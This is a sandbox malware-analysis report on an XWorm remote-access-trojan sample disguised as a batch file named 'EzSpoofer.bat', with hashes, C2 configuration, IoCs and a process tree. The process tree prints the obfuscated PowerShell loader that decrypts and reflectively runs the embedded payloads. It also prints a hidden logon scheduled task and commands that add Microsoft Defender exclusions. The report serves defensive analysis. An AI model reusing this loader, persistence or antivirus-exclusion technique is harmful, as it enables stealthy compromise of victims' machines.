xworm | 2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0

Resubmissions

24-01-2025 14:57

250124-sb3x4atncs 10

24-01-2025 14:50

250124-r7zd4svpfj 10

Analysis

max time kernel
279s
max time network
280s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2025 14:50

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

EzSpoofer.bat
Size

262KB
MD5

1298934b3f4c37d349794f0686c6e7a8
SHA1

9a6848b79ba8aba796514526898b4c9217301bc0
SHA256

2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
SHA512

ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
SSDEEP

6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Mutex

RRwG35fodUbwRp96

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3636-50-0x0000012F51B00000-0x0000012F51B10000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 64 IoCs

flow	pid	Process
16	3636	powershell.exe
19	3636	powershell.exe
21	3636	powershell.exe
22	3636	powershell.exe
27	3636	powershell.exe
28	3636	powershell.exe
30	3636	powershell.exe
31	3636	powershell.exe
36	3636	powershell.exe
37	3636	powershell.exe
41	3636	powershell.exe
43	3636	powershell.exe
45	3636	powershell.exe
46	3636	powershell.exe
54	3636	powershell.exe
55	3636	powershell.exe
61	3636	powershell.exe
62	3636	powershell.exe
64	3636	powershell.exe
65	3636	powershell.exe
66	3636	powershell.exe
67	3636	powershell.exe
68	3636	powershell.exe
69	3636	powershell.exe
70	3636	powershell.exe
71	3636	powershell.exe
72	3636	powershell.exe
73	3636	powershell.exe
74	3636	powershell.exe
75	3636	powershell.exe
76	3636	powershell.exe
77	3636	powershell.exe
78	3636	powershell.exe
79	3636	powershell.exe
80	3636	powershell.exe
81	3636	powershell.exe
82	3636	powershell.exe
83	3636	powershell.exe
84	3636	powershell.exe
85	3636	powershell.exe
86	3636	powershell.exe
89	3636	powershell.exe
90	3636	powershell.exe
92	3636	powershell.exe
93	3636	powershell.exe
94	3636	powershell.exe
95	3636	powershell.exe
96	3636	powershell.exe
97	3636	powershell.exe
98	3636	powershell.exe
99	3636	powershell.exe
100	3636	powershell.exe
101	3636	powershell.exe
102	3636	powershell.exe
103	3636	powershell.exe
104	3636	powershell.exe
105	3636	powershell.exe
106	3636	powershell.exe
107	3636	powershell.exe
108	3636	powershell.exe
109	3636	powershell.exe
110	3636	powershell.exe
112	3636	powershell.exe
113	3636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3636	powershell.exe
3124	powershell.exe
4648	powershell.exe
4176	powershell.exe
1108	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "194"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3124	powershell.exe
3124	powershell.exe
4648	powershell.exe
4648	powershell.exe
3636	powershell.exe
3636	powershell.exe
4176	powershell.exe
4176	powershell.exe
1108	powershell.exe
1108	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe
Token: 33	4648	powershell.exe
Token: 34	4648	powershell.exe
Token: 35	4648	powershell.exe
Token: 36	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe
Token: 33	4648	powershell.exe
Token: 34	4648	powershell.exe
Token: 35	4648	powershell.exe
Token: 36	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe
Token: 33	4648	powershell.exe
Token: 34	4648	powershell.exe
Token: 35	4648	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1160	LogonUI.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 3124	1388	cmd.exe	85
PID 1388 wrote to memory of 3124	1388	cmd.exe	85
PID 3124 wrote to memory of 4648	3124	powershell.exe	87
PID 3124 wrote to memory of 4648	3124	powershell.exe	87
PID 3124 wrote to memory of 3520	3124	powershell.exe	90
PID 3124 wrote to memory of 3520	3124	powershell.exe	90
PID 3520 wrote to memory of 5080	3520	WScript.exe	91
PID 3520 wrote to memory of 5080	3520	WScript.exe	91
PID 5080 wrote to memory of 3636	5080	cmd.exe	93
PID 5080 wrote to memory of 3636	5080	cmd.exe	93
PID 3636 wrote to memory of 4176	3636	powershell.exe	95
PID 3636 wrote to memory of 4176	3636	powershell.exe	95
PID 3636 wrote to memory of 1108	3636	powershell.exe	97
PID 3636 wrote to memory of 1108	3636	powershell.exe	97
PID 3636 wrote to memory of 5060	3636	powershell.exe	118
PID 3636 wrote to memory of 5060	3636	powershell.exe	118

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_522_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_522.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4648
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_522.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_522.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_522.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_522.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3636
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4176
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1108
      - C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /r /t 0
        6⤵
        
        PID:5060

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38e7855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1d417e8cfeb571d420db430364b08429

SHA1
c0d74a8c261cd060a2c7f1fa200a59240f42a610

SHA256
d639f338f4d7b3046b4c770d897d31b6c52ce1ba7e3be43240afefc90f6d9140

SHA512
f325131903f858a330150976984cc916e5aad9feec82d8f34e9134b43736859cb0c0bc4b64b97ceccad6f11105655a0723efc3cdea15a094f9b43a65be944818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ylnm0olq.tqi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_522.bat

Filesize
262KB

MD5
1298934b3f4c37d349794f0686c6e7a8

SHA1
9a6848b79ba8aba796514526898b4c9217301bc0

SHA256
2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0

SHA512
ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_522.vbs

Filesize
115B

MD5
090e154461c3eb70aa305cfd25b42128

SHA1
226b019b71c334e50aaa821c170c1d701b38c7df

SHA256
56e04ea5ad19b81ef8a18b736ee11a398831d3907e2bdf946b1fe4cd07564966

SHA512
e9dd655b7d072b0a8e178c3cc2a4788a58f2ff97f65a359d025bf6bdedd081ac85bfef77ff781ad407f09f7d771e89c960a9763dab25925bf8aded084c8b5259

Download Submit
memory/3124-14-0x0000020228EE0000-0x0000020228F14000-memory.dmp

Filesize
208KB

Download
memory/3124-13-0x000002020EA00000-0x000002020EA08000-memory.dmp

Filesize
32KB

Download
memory/3124-51-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/3124-0-0x00007FFEEB2D3000-0x00007FFEEB2D5000-memory.dmp

Filesize
8KB

Download
memory/3124-12-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/3124-2-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/3124-1-0x0000020228C80000-0x0000020228CA2000-memory.dmp

Filesize
136KB

Download
memory/3636-49-0x0000012F4F850000-0x0000012F4F884000-memory.dmp

Filesize
208KB

Download
memory/3636-50-0x0000012F51B00000-0x0000012F51B10000-memory.dmp

Filesize
64KB

Download
memory/3636-73-0x0000012F51B20000-0x0000012F51B2A000-memory.dmp

Filesize
40KB

Download
memory/4648-30-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/4648-18-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/4648-17-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download
memory/4648-16-0x00007FFEEB2D0000-0x00007FFEEBD91000-memory.dmp

Filesize
10.8MB

Download